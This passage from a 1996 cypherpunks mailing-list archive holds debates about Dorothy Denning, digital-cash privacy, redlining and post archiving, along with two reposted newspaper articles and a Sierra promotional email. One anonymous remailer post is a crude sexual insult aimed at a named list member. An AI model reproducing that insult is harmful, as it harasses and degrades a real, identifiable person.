The level of vitriol expressed by random e-mail users in the whole
world can hardly be said to be a "point" in anyone's favor.

>All of the people I know who have met her find her to be a
>pleasant person, and the occasional Email messages we have
>exchanged have certainly been positive and friendly.

Irrelevant, of course.  Some of the most terrible people in the world
have been pleasant.  D. Denning may or may not be the most terrible
person in the world, but her pleasantness is unrelated.

>While she tends to view the Four Horsemen of the Infocolypse as a bit
>more threatening than the typical Cypherpunk, I don't think her views
>are so extreme as to justify the continuous screams of "crypto
>toady", "government suckup", and "wicked witch" which seem to pop up
>in response to her every utterance.

Personally, what I have found irritating about Denning is the fact
that she is widely considered to be a credible spokesperson.
Statements along the lines of "I can't tell you the scenarios we are
worried about because they are classified" are a little hard to take
seriously in a democracy.

Imagine if you or I tried to claim that we had to deploy strong crypto
but that for "reasons of cypherpunk security" the scenarios with which
we were concerned could not be revealed.  We would be laughed out of
the forum and properly so.

Denning is considered credible solely because her statements are
consistent with the interests and views of those in authority.

>I would even go so far as to say that this list would be a lot
>more entertaining if she were contributing to it, and sci.crypt
>is certainly a less interesting place now than it was in bygone
>days when she was posting there.

Denning has little to add to the cypherpunks list.  The core belief of
the cypherpunks is that their mail is their business.  People who do
not believe this are not cypherpunks and should not subscribe to the
list nor should they post to it.

Sir Galahad






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 3 Dec 1996 07:38:17 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: Modulating the FM noise spectrum considered infeasible
In-Reply-To: <c=US%a=_%p=Inference%l=LANDRU-961203145204Z-12520@landru.novato.inference2.com>
Message-ID: <v03007876aec9f8e38f27@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:52 am -0500 12/3/96, James A. Tunnicliffe wrote:
> At 2:55 am -0500 12/3/96, Timothy C. May wrote:
>> [...]Having said this, Johnson noise makes a superior noise source,
                          ^^^^^^^
>> if a physical source is desired.
<snip>
>Yours makes NOISE?  Impressive...
>
>In this case, I guess entropy is preferable to atrophy, though.  :-)

Indeed.

I've found that my Johnson only makes noise with the proper, er,
peripheral, though...

Cheers,
Bob Hettinga
(whose .sig seems quite appropriate to cypherpunks today...)


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eva bozoki <eva@dsnt.com>
Date: Tue, 3 Dec 1996 07:51:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Good dr. Dobbs
Message-ID: <32A44A86.35AE4690@dsnt.com>
MIME-Version: 1.0
Content-Type: text/plain


John Fricker <jfricker@vertexgroup.com  wrote:
> It would appear that Ms. Bozoki would not purchase the product sheis creating!
> In order to establish trust in an encryption product more is required than
> simply agreeing that the company is competent. Competence does not imply
> trustworthiness. Trust can be established through review and examination of
> the innards, algo's and source code. A quick read of www.dsnt.com does not
> reveal any additional information on the crypto used (other than it being 
> 512 byte public key algo using Diffie-Hellman key exchange)

I  would like to point out that our white paper with technical details
can be found on our Web-site:    www.dsnt.com/whitepaper.htm

-- 
Dr. Eva Bozoki
Chief Scientist
DSN Technology, Inc.
(516)467-0400




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matthew J. Miszewski" <mjmiski@execpc.com>
Date: Tue, 3 Dec 1996 08:51:48 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Most "digital cash" does not deserve the name
Message-ID: <3.0.32.19961203105035.0069b06c@execpc.com>
MIME-Version: 1.0
Content-Type: text/plain


(snip)
>(Just for the record, what the hypothetical insurance companies and
>employers are doing by using data they have obtained should not, in a free
>society, be illegal in any way. All information contributes to
>decision-making, about loans, credit, insurance, employment, etc. In a free
>society, it is up to people to not disclose that which they do not wish
>remembered.)

While the libertarians on the list have affected my way of looking at
regulation I, and others, do not subscribe (suscribe ;)) to Tim's absolute
theory.  Unless, of course, by free society Tim is refering to one where
corporations hold themselves to a level of "personal" responsibility, which
in many realms is part of any definition of "free".

Take, for example, the practice of redlining.  How are people who live in
"bad" neighborhoods supposed to not reveal that information.  Has anyone
tried to get a loan or a reasonable insurance rate without disclosing your
address?  Like I said, if insurance companies exercised some
"responsibility" as opposed to inaccurate assesments based on residence,
then this problem would not exist.  In the real world one can not avoid all
collection of data to be used in Bad(TM) ways.  

Media attention doesn't work.  Bad Business practices dont matter to most.
But those in need here should not have the luxury of appealing to their
elected officials?

Matthew J. Miszewski


>
>--Tim May
>
>
>Just say "No" to "Big Brother Inside"
>We got computers, we're tapping phone lines, I know that that ain't allowed.
>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
>Higher Power: 2^1398269     | black markets, collapse of governments.
>"National borders aren't even speed bumps on the information superhighway."
>
>
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 3 Dec 1996 11:14:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PRIVACY: X-No-Archive and mail.cypherpunks
Message-ID: <199612031904.LAA23702@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



At 10:24 AM 12/3/1996, Timothy C. May wrote:
>At 10:15 AM -0600 12/3/96, Igor Chudov @ home wrote:
>
>>This is primarily addressed to the person who supports cypherpunks
>>mail-to-news gateway. If you know who such person is, please send
>>his/her address to me.
>....
>>I am opposed to seeing my articles showing up in DejaNews and other
>>search engines. All my emails and usenet postings have this header
>>line. However, when cypherpunks-to-newsgroup gateway reposts all
>>articles, it strips this header line. I believe it to be a mistake
>>and hope that it will be corrected.
>
>Igor raises an important point.
>
>I believe he is misguided in his expectation that his public utterances in
>a forum containing at least 1200 readers (and probably more, through
>gateways, etc.) that he can limit uses of his posts. Any recipient of his
>public utterances may choose to quote them in other articles, forward them
>to friends, archive them on his own disks, etc.
>
> ...
>
>In a free society it is impossible to control what people do with material
>given to them. The best means of protecting one's writings is not to
>distribute them.

It is unlikely that anybody is going to pay money for our postings,
even Igor's postings.  Copyright is not the issue.

Perhaps, Igor is worried about the unpredictable consequences of his
posts being readable by anybody, anywhere, forever.  The solution to
that problem is straightforward and I leave it as an exercise.

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Tue, 3 Dec 1996 12:19:36 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: RE: Counterproductive Dorothy Denning Flames
Message-ID: <c=US%a=_%p=msft%l=RED-81-MSG-961203195822Z-51569@INET-04-IMC.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


From:	"Sir Galahad"

>All of the people I know who have met her find her to be a
>pleasant person, and the occasional Email messages we have
>exchanged have certainly been positive and friendly.

Irrelevant, of course.  Some of the most terrible people in the world
have been pleasant.  D. Denning may or may not be the most terrible
person in the world, but her pleasantness is unrelated.
............................................................


Statements like these, with which cpunks retort to each other all the
time, are examples of the ever-continuing exercise of logic which goes
on on the list - even if not formally delineated nor announced as being
of such intent (LOGOS).   

I am glad for the points which "Sir Galahad" brought up, because they
point out the difference between essential vs non-essential elements in
arguments like this one.   Objections present the opportunity to more
definitely identify what *is* the critical element which makes up the
substance of an issue (such as what is really is offensive and
objectionable about Denning, aside from her personality
characteristics).


     Denning is considered credible solely because her statements are
     consistent with the interests and views of those in authority.

Yet even if one's statements are not consistent with the established
authorities, they could be  credible and noteworthy to a wide audience,
were the statements in consonance with reality, expressing truths
observable to any (once they were isolated and identified) and
understable to those who hear or read them.  

The 'authorities' (appointed, not necessarily actually  "authorities" in
terms of knowledge) may find Denning's statements agreeable because
these support their own views and government positions, but what is
crucial in this support is the consequence of her arguments about GAK:
if her statements convince the right people into complicity, into giving
up the authority over their right to self-determined privacy, then the
'authorities' will be satisified that they will not have to deal with
any protesting opposition which would prevent them from implementing
their plans - they can proceed with their 'authority' intact, as though
it had been validated.

But if she (among others, of course) cannot convince the right
influential bodies that passive acceptance of the 'authorized' point of
view is correct and noble, then this means that the authorities cannot
not proceed as they would like, and this would reduce the power of their
position in society.

If there was not an issue of power involved, it wouldn't matter so much
what Denning has to say or whether it is credible or not.   But if what
she has to say adds support to the positions of those already in
'authority' - that is, if people accept her arguments for GAK in place
of their own apprehensions against it, then control in the central
corridors of government will have been preserved and it will be
'business as usual'.

So is Denning offensive because she is unpleasant per se, or do negative
opinions of her exist because of who/what she is supporting? i.e.,
because she is on "their" side, rather than "ours", because she employes
her reasoning to their benefit, rather than to ours whose singular
authority in this matter is under contention?

    ..
Blanc
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: varange@crl.com (Troy Varange)
Date: Tue, 3 Dec 1996 12:09:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: IP address
Message-ID: <Love@22825>
MIME-Version: 1.0
Content-Type: text/plain


	Well, the "danger" of posting a static IP must be even
	greater than with a temporary IP.

	Just call the police if you uncover a bonafide case of a
	denial of service attack.  From what I gather, they take
	this shit seriously, and have better capacities of
	getting lazy admins to reveal the relevent data in their
	logs.

-- 
Cheers!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alzheimer@juno.com (Ronald Raygun Remailer)
Date: Tue, 3 Dec 1996 09:08:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Copyright violations
Message-ID: <19961203.110728.12095.0.alzheimer@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


Washington Post: Monday, December 2, 1996
 
Folks Who Welcome Charge Cards
 
By Daniel Grant
 
In days past, one measure of someone's wealth was the thickness of his or
her wallet.
 
Nowadays, many consumers carry hardly any cash at all, relying instead on
the cards issued to them by major credit card companies. Most
self-employed people and those who work out of their homes recognize that
an increasing number of the people who buy from them are more likely to
pay with a credit card than with cash or a check. 
 
A benefit of being paid by credit card is that, first, by not carrying
large
amounts of cash or checks one is less vulnerable to robbery and, second,
financial institutions credit one's bank account faster for a payment by
credit
card than for a check. 
 
As a result, more and more self-employed individuals are seeking
authorization from banks and other financial institutions to accept
payment by
credit card. Banks that issue Diners, MasterCard and Visa cards, however,
have become increasingly wary of extending such authorization to
individual
entrepreneurs. 
 
"Citibank is no longer accepting applications for credit card processing
for
home-based operations," company representatives in the bank's Merchant
Services section are instructed to say. Other banks say the same, citing
a
recurring problem of mismanagement and fraud on the part of these
entrepreneurs. Problems include refusing to resolve complaints from
customers, going out of business, running into debt and declaring
bankruptcy,
relocating elsewhere without revealing their new addresses.
 
Clyde Heasly, an adviser to entrepreneurs at the Small Business
Administration in the District of Columbia, says, "I just tell people to
call 
the credit card department of bank after bank after bank until someone
eventually will take care of you." Some people will do just that. Others
apply
directly to American Express (800-445-2639, ask for Establishment
Services) or Discover (800-347-6673), which grant permission to accept
payment by these cards directly, without the intercession of a bank. 
 
An ongoing problem for banks is the merchant's lack of a "storefront," a
business address where the seller can be found most weeks during business
hours. "I was told by a number of banks, 'If you don't have a storefront,
you
can't be a credit card accepter,' " says Ed Duggan of Boca Raton, Fla.,
who
with his wife, Helen, makes teddy bears out of recycled fur coats, which
they
sell at arts and crafts shows. "When I finally found a bank that would
let me
process credit card receipts, it charged me 5 percent on all sales plus
deposit
charges plus verification charges, and there may have been some other
charges." 
 
Other sellers who are often on the road say they have had the same
experience: "I had been banking with this East Dallas bank for 12 years,
establishing a good history, but when I asked to process credit card
orders,
nothing about me was good enough because I didn't have a storefront,"
says
Sharon Johnston, a jewelry maker in Dallas, who largely sells her work at
shows or through mail-order. "Finally, I made up a 3-by-5-foot storefront
in
a friend's gallery in order to have a store address that wasn't my home
address." 
 
Both the Duggans and Johnston eventually moved their credit card
processing accounts to Electronic Card Acceptance Corp. in Alexandria,
which set up merchant accounts for them at banks, lowering their fees to
1.75 percent of sales. 
 
There are a number of bank brokerage firms to which sellers of all kinds,
including those who work out of their homes, may apply for permission to
accept credit card payment. The largest include Seattle-based Card
Services
International (206-608-1364), First Data Resources in Omaha
(402-222-2000), and First USA Payment Tech in Dallas (214-849-3776),
as well as Financial Alliance (800-928-2273 or 502-339-0595) and
National Processing Co. (502-364-2000), both in Louisville. 
 
Such companies arrange approval for merchants through banks that are
willing to take on the risk, accepting some or all of the major credit
cards.
There also are several hundred other companies around the country, known
as independent sales organizations, or ISOs, that look to sign up
merchants
for these brokers as well as for certain banks. Most ISOs belong to the
Electronic Transactions Association (3101 Broadway, Suite 585, Kansas
City, Mo. 64111; 800-695-5509). 
 
"We probably work with about 20 new customers a month," says John
Carro, president of Tri-State Merchant Services in Hauppauge, N.Y. "A lot
of them sell by mail-order or telephone, and it is often a type of second
or
additional income. We get almost all of them through referrals from banks
who don't want to handle them because of the perceived risk factor." 
 
That risk, Carro says, is the potentially weak financial situation of the
merchant who may be able to sell items but not have money (or other
collateral) in the bank in the event of "charge-backs" -- a dissatisfied
customer wanting his or her money back. The bank, or whoever processes
the charges, ultimately is responsible for those debts. 
 
Whether applying to a bank or bank brokerage company, American Express
or Discover, all applicants are asked for basically the same information:

name, address, Social Security number and telephone number (also, home
address and telephone number if the applicant's place of business is
elsewhere); the applicant's bank; how long in business; what products are
being sold; the average price for products sold; how the product is
marketed;
annual or monthly sales volume of sales; the state sales tax number or
federal
tax identification number; business references (suppliers, patrons, shops
or
galleries). 
 
Additionally, the applicant may be asked to submit federal tax statements
for
the preceding two years and/or bank statements for the preceding three
months. 
 
Applicants are asked how they plan to process credit payments. There are
two main methods of processing credit card receipts: manually, using an
imprinter and later that day processing the charges into an
IBM-compatible
computer and transmitting them via modem to the bank or bank brokerage
company; and electronically, through a point-of-sale terminal, of the
kind one
often sees used in restaurants and department stores. 
 
The benefit of the point-of-sale terminal is that approval of the credit
card
takes less than a minute, reducing the risk factor for fraud. Such
terminals,
however, generally cost far more than the software required for the modem
method, and they also require separate telephone lines, which may not be
available at many arts and crafts shows.
 
The credit companies check business and credit references (through the
same
sources as a mortgage broker), the applicant's financial history and
other
relevant information. For instance, Card Services International will hire
a
local appraiser to examine where the applicant works, taking photographs
of
the person's house, sales booth and studio in an attempt to determine the
viability of his business. 
 
The approval process normally takes one to three weeks. As anxious as
people may be for a credit company to approve them, they should shop
around for the best rates, which vary widely. American Express, for
example,
has no application or setup fees, and it charges merchants an average of
3.5
percent (if the sale is processed electronically) and 4.5 percent (if the
sale 
is
processed manually) for each sale. (Working with American Express is
complicated in that one does not submit charges to the company and,
instead, must use a third-party processor, which involves an extra
charge.) 
 
Financial Alliance, for its part, takes 2 to 3 percent of the sales price
(depending upon the volume, lowering the rate for higher sales), but it
charges a $ 125 application fee, a $ 7.50 monthly statement fee,
transaction
fees of 20 to 30 cents per sale and adds a $ 695 charge for the purchase
of
the imprinter, computer terminal and modem (for transmitting charges back
to
the company) and credit card decals. 
 
Other companies' rates range from 2 to 5 percent (depending upon the
average price of the pieces sold, with higher rates for less-expensive
items),
and there may be application and monthly maintenance fees. Some
companies sell point-of-sale terminals to customers for less than others,
but
their percentage rate may be higher. Thus there are several factors to
weigh
in selecting one company over another. 
 
Different companies also have their own prejudices. American Express does
not allow its cards to be used when selling as a wholesaler to retail
outlets,
for instance, and Financial Alliance is unwilling to authorize credit
card
activity for all but the smallest amount of mail-order sales.
 
"Mail-order is a high-risk business," says Dave Lutrell, sales manager at
Financial Alliance. "You don't know who's calling in. They can have
fraudulent cards. It's better when you can see the customer." 
 
 
Boston Globe: Sunday, November 24, 1996
 
Rocking the Cradles of Capitalism 
 
By Maria Shao
 
Harvard Business School and the Sloan School of Management at the
Massachusetts Institute of Technology, rivals in the samll world of elite
business schools, are separated by much more than the Charles River.
Harvard, renowned for turning out the future chief executives of America,
has
long ben a citadel of general management education. Sloan, with a
reputation
for producing financial wizards and high-tech managers, has grown up
under
the umbrella of one of America's premier technology universities. Now, in
an
era when business schools are jockeying more than ever to attract top
students, Harvard and Sloan are, in some ways, tring to become more like
each other. 
 
"I'm the poster child for poets," declares Sarah Fulkerson. Indeed, the
28-year-old majored in the philosophy of religion at Williams College,
holds
a graduate degree in art history, and, for four years, owned and managed
the
Boston Banshees, a men's professional bicycle racing team. 
 
So what's she doing at the Sloan School of Management? 
 
Students such as Fulkerson are proof that the business school at the
Massachusetts Institute of Technology has moved beyond its image as a
training ground for "quant jocks" and computer nerds. 
 
No one could be happier about that than Glen L. Urban, dean of the
44-year-old business school. A marketing specialist and sometime
sculptor,
Urban has followed celebrity economist Lester C. Thurow -- his
predecessor
-- in broadening the school's reputation beyond a technological niche. 
 
"We want them to be general managers and technologically smart. It's not
either or," says Urban, 56, whose bold suits, shoulder-length hair and
silver
bracelet defy the pinstriped stereotype of a business dean. 
 
Since becoming dean in 1993, Urban has revamped the curriculum, launched
global projects, started forays into "distance learning" and overseen a
40
percent increase in Sloan's MBA enrollment. 
 
The efforts seem to have paid off: Sloan has moved up in magazine
rankings,
to No. 9 on Business Week's 1996 roster, compared with 13th in 1992. In
U.S. News & World Report rankings, the school slipped to No. 2 in 1996,
down from first place in 1995, but up substantially from No. 6 in 1993. 

 
While all the elite business schools are enjoying an applications boom,
Sloan
has experienced the biggest windfall: Applications soared 80 percent
between 1994 and 1996. This past year, 83 percent of those accepted chose
to enroll, up from 66 percent three years earlier. 
 
Still, at least locally, Sloan is often overshadowed by its richer,
bigger and
more well-known rival across the river. Harvard Business School is viewed
as the preeminent breeding ground for corporate chief executives, has a
far
bigger base of loyal alumni and boasts a $ 545 million endowment,
compared
with Sloan's $ 153 million. While HBS's stately neo-Georgian campus
boasts
manicured lawns, tennis courts and 27 well-appointed buildings, Sloan
faculty
and students are squeezed into four industrial-style buildings featuring
metal
file cabinets, linoleum floors and flourescent lighting. 
 
And unlike HBS, which operates autonomously from the rest of Harvard,
Sloan maintains close links with MIT, particularly its School of
Engineering.
The MIT shadow has been both a blessing and a curse. "We don't want to
run away from our strength. I want to be perceived as having the
technological skills, but I don't want the shadow of being seen as
nerds," says
Urban. 
 
The school still has far to go before burying the numbers-crunching
image. A
hefty 45 percent of its MBA students majored in engineering as
undergraduates while 12 percent majored in math and sciences. A survey
found that some corporate recruiters still view Sloan as a "technical
business
school" rather than a "management school." 
 
"It takes a long time to change market perception," says Ilse Evans,
career
placement office director and a former software marketing executive Urban
hired to promote Sloan among recruiters. "I see an enormous future for an
MBA with a technology-oriented curriculum. General management and a
grounding in technology are going to meet." 
 
Even Fulkerson, the poet-turned-Sloan-student, says she chose to attend
the
school because "it had such quantitative weight . . . I have a very
liberal arts
background. I wanted to balance myself out." 
 
Under Urban, the school has done much to balance itself out. In 1994, it
began granting a master's in business administration instead of its
traditional
master's of science in management. With the MBA, Sloan dropped its
longstanding thesis requirement. Today, the vast majority of students
choose
the MBA. 
 
The curriculum has been revamped to emphasize "soft" people skills as
compared to "hard" quantitative and analytical skills. Students are now
required to take a communications course. And, in an effort to teach
teamwork, they're divided into groups of eight for first-term classes.
The
more flexible curriculum -- fully implemented last year -- features
required
core courses in the first term, followed by a choice among seven
different
"tracks," such as financial management, entrepreneurship and
manufacturing. 
 
Urban himself seems to be the antithesis of the MIT financial jock. An
expert
on linking market research and product development, he is also a sculptor
whose creations adorn his office: stone and metal abstract pieces, a
welded
steel eagle and a glass-topped coffee table with metal bolts as legs. A
"Dean's Gallery" outside his office displays art by MIT faculty, staff
and
students. "Creativity is in an important element for my job, and
important to
train our students in," says Urban. 
 
Now, as the business world goes global, Urban (along with many other
leading business deans) is pushing his school's brand of management
education beyond American shores. Already, Sloan's student body is the
most international of the top business schools, with 37 percent of its
MBA

candidates coming from outside the United States. Seizing on the cachet
the
MIT name has long enjoyed in Asia, Urban launched alliances in June with
two of China's leading universities, Fudan University in Shanghai and
Tsinghua University in Beijing. Sloan also has collaborations planned or
under
way in Singapore, Taiwan, Thailand, India, Mexico and Chile. 
 
And while Harvard may be an Information Age neophyte, Sloan is well under
way in using technology to transform teaching and learning. A $ 3.5
million
trading room features Wall Street-style technology for teaching financial
engineering. 
 
An evangelist for what is called "distance learning," Urban foresees a
day
when business education can be delivered to students - particularly
executives taking mid-career or refresher courses - around the globe
without
leaving their job sites. In December 1995, Sloan installed two distance
learning facilities. A system design and management program will teach
engineering managers by videoconference hookup; the students will come
from AT&T, IBM, Raytheon and other sponsors. The school recently
offered a Web-based course on negotiation for alumni, many of whom
logged on from home. Call it glasnost with a mouse. 
 
In the 14 months since taking the reins at Harvard Business School, Kim
B.
Clark has moved quickly to put his stamp on the West Point of capitalism.
He has brought the tradition-bound, 88-year-old institution into the
computer
age and created a more open culture, all while carrying out the school's
biggest curriculum redesign since the 1960s. 
 
"This place was hungry for change," declares Clark, 47, from his sparse,
cavernous office in 125 Morgan Hall. 
 
While the Harvard Business School is still indisputably the world's most
famous training ground for business leaders, other schools have
challenged its
standing in recent years. When Clark became the school's eighth dean in
October 1995, many looked to him to launch innovations that would help
Harvard maintain its leadership. 
 
Nowadays, "the place is on the move," the dean insists. 
 
Still, Clark, who spent 18 years on the business school faculty before
becoming dean, has had to tred gingerly among a faculty of world-class
egos
and management experts. Says a rival business dean: "He has a freighter
to
move. He may be running the risk of changing too much." But so far, Clark
has received plaudits from faculty and students for his most visible
project: an
$ 11 million technology initiative. 
 
Under his predecessor, John H. McArthur, the school had fallen behind its
rivals in joining the Information Age. McArthur had frozen technology
spending, according to Clark, because the school had sprouted too many
disparate computer networks. Even senior faculty had to pay for their own
office computers. 
 
"Up until a year or two ago, you could go there with a quill pen and
papyrus,"
says Dwight Gertz, a graduate of the school who heads Symmetrix, a
Lexington management consulting firm that recruits at Harvard. 
 
"We were behind. It wasn't a perception. It was a reality," says Clark. 
 
Clark himself is something of a computer guru, thanks to a background in
technology and product development. 
 
He moved quickly to install a computer lab in the basement of Shad Hall,
with 108 PCs capable of delivering desktop video. Another lab with 50
computers will open Monday. All told, 1,400 desktop machines have been
replaced.
 
The school previously had seven networking standards, six e-mail systems
that weren't linked and 77 models of computers on faculty desks. That has
now been simplified into a system of PowerMac and Pentium machines
running on a single schoolwide intranet connecting students, faculty and,

soon, alumni. Students now receive e-mail addresses with lifelong
forwarding
that will link them even after graduation. 
 
"We went from 1989 to 1996 in about four months," says Earl Sasser, a
professor of service management. 
 
In September, the school unveiled a software "platform" that gives
students
customized access to everything from their daily schedules and course
work
to student biographies and class seating charts. Faculty members are
required
to put assignments, slide presentations and other course materials on
line. 
 
"It's great. You can have everything at your fingertips," says Christine
Dinh-Tan, a second-year MBA student. 
 
"I feel much closer to my students. We have a little electronic community
rather than the class being a physical community," says professor David
Upton. 
 
But Clark has grander visions than just using technology for convenience
and
connections. He is encouraging the use of desktop video, a technology
that
he says could "reinvent" Harvard's vaunted case method of teaching.
(Business case involves studying a specific situation, with students
discussing
and coming up with their own solutions.) 
 
Upton, a professor of operations management, developed the school's first
fully computerized case study. His Pacific Dunlop China case brings to
life
the dilemmas faced by the Australian manager of a Chinese sock factory --
through video interviews, spreadsheets, multimedia "tours" of the plant
and
living quarters, and simulations of the workings of the factory. "It
makes the
situation much richer. We don't have to tell them about the situation in
a case;
we can show them," says Upton. 
 
More than a half dozen such electronic cases have been written. That's
still a
paltry proportion of the 600 cases the school writes yearly, but Clark's
goal
is 50 to 100 electronic cases over the next few years. 
 
David Garvin, who teaches general management, recently ran an "electronic
bulletin board" discussion for his students with 60 alumni, who ms with
"smart" lecturns that can deliver full-motion video to every student
desktop. 
 
Some skeptics suggest that Clark's ballyhooed high-tech plunge may be
more
style than substance. "It's a visible shallow sign of change. I suspect
it won't
have a big impact in the foreseeable future," snaps one professor. 
 
Still, Clark's championing of an electronic community at the school goes
hand
in hand with the more open culture he has fostered. While McArthur rarely
used e-mail, Clark makes a point of returning student e-mail. "The
students
have been very respectful of my time. I have not been inundated," he
says. 
 
He has held numerous question-and-answer sessions with students. Twice a
year, he holds a campus party for staff and students, the most recent one
a
"Family Day" with pony rides and golf demonstrations.
 
"They're trying to be more customer-focused, trying to please the
students,"
says student Dinh-Tan. 
 
"There's more openness and dialogue," says professor Garvin. 
 
While McArthur ran the school with a tight circle of senior faculty and
administrators, Clark has given more budgeting and staffing autonomy to
each of 12 academic "areas." A group of 25 area heads, senior associate
deans and directors of research -- called the "Unit Planning Group" -
meets
monthly with him.
 
Clark is also shifting the school to a less rigid curriculum and
schedule,
changes that were first planned in the early 1990s under McArthur. 
 
The school now offers a short-track MBA that takes 16 months instead of
two academic years. And it now admits students in January as well as
September. Previously, the school offered one monolithic MBA program,
with 800 students entering each September. Professors say the new
structure
puts students into smaller groups, allowing for more varied course work,
quicker changes and a more personal experience.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Tue, 3 Dec 1996 12:18:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: PRIVACY: X-No-Archive and mail.cypherpunks
In-Reply-To: <199612031904.LAA23702@abraham.cs.berkeley.edu>
Message-ID: <v03007800aeca3aa7f70a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:04 AM -0800 12/3/96, John Anonymous MacDonald wrote:

>It is unlikely that anybody is going to pay money for our postings,
>even Igor's postings.  Copyright is not the issue.

Copyright is not identical with commercial use. A copyrighted work, even if
not sold commercially, remains protected. (Though of course the most
commercial works are the works most aggressively litigated on copyright
grounds.)

In any case, my example was not arguing that someone was planning to pay
for our posts. Even if I had made this point, I'd've been _right_, as some
of the filtering services charge _money_, e.g., Eric Blossom's service, so
people are clearly paying for the posts, or the filtering, or both. A
familiar situation with edited items.

(And the issue becomes much more tangible when stuff from commercial
newspapers gets forwarded to the Cypherpunks list, and then archived. Even
if Igor Chudov is not primarily concerned with commercialization of his
posts, clearly "The New York Times" and "The Wall Street Journal" are.
Recall the reports--confirmed?--that Todd Masco had to drop his archiving
of the list when legal warnings arrived from these sorts of news services,
complaining about their items being archived and made available via search
engines.)

>Perhaps, Igor is worried about the unpredictable consequences of his
>posts being readable by anybody, anywhere, forever.  The solution to
>that problem is straightforward and I leave it as an exercise.

Indeed, if Igor does not want his posts added to his dossier entry in the
BlackNet Dossier Service (coming to an offshore site soon), he has various
ways to ensure this. At least until better tools exist to link nyms to true
names, a service BlackNet expects to offer (using the latest Bayesian
inference techniques) within the next 18 months.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Tue, 3 Dec 1996 10:59:19 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9612031845.AA10920@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:50 AM 12/3/1996, Matthew J. Miszewski wrote:
>(snip)
>>(Just for the record, what the hypothetical insurance companies and
>>employers are doing by using data they have obtained should not, in a free
>>society, be illegal in any way. All information contributes to
>>decision-making, about loans, credit, insurance, employment, etc. In a free
>>society, it is up to people to not disclose that which they do not wish
>>remembered.)
>
>While the libertarians on the list have affected my way of looking at
>regulation I, and others, do not subscribe (suscribe ;)) to Tim's absolute
>theory.  Unless, of course, by free society Tim is refering to one where
>corporations hold themselves to a level of "personal" responsibility, which
>in many realms is part of any definition of "free".
>
>Take, for example, the practice of redlining.  How are people who live in
>"bad" neighborhoods supposed to not reveal that information.

You may lend your own money to whomever you wish.  If you do not wish
to lend money to somebody, that is your business.

It is difficult to understand why redlining should be illegal, to the
extent that it even occurs.  When it does occur, we expect that eager
entrepreneurs such as yourself will rush in to grab new customers.

As for the privacy issue, you seem to be proposing that you have some
sort of right to borrow money on terms which are not acceptable to the
lender.  You need not give your address just as you need not borrow
the money.

Of course, we hardly live in a free banking era.  Most people would
prefer to bank with a company that respects their privacy.  Yet, banks
are so tightly controlled in the United States that they most often
will not dare to protect the privacy of their customers for fear of
regulatory consequences.  When the service is provided, it cannot be
advertised.

And, the banks are required to report all transactions over $10,000 or
give up all information if the attorney general tells them it involves
national security.

You are in the unpleasant position of appealing for protection from
the very people who have robbed you of your privacy.

Red Rackham






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Tue, 3 Dec 1996 11:14:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9612031900.AA11026@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C[ocksucker] May, a product of anal 
birth, appeared with a coathanger through his 
head.

/o)\ Timothy C[ocksucker] May
\(o/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sierra On-Line <nobody@sierra.com>
Date: Tue, 3 Dec 1996 14:36:16 -0800 (PST)
To: undisclosed-recipients:;
Subject: The latest from Sierra On-Line
Message-ID: <bulk.14712.19961203112135@sierra.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks from all of us at Sierra for registering your product. Be sure to 
check our Web site for all kinds of extras and goodies to help you enjoy 
your product all the more.

We also wanted to tell you about a special offer for our online 
customers--just in time for the holidays. Buy two Sierra products and 
get one free. Yep, gratis, complimentary, no charge. That "free."

So go to our web site <http://www.sierra.com/> to find out about our newest 
releases and take advantage of this limited-time offer.

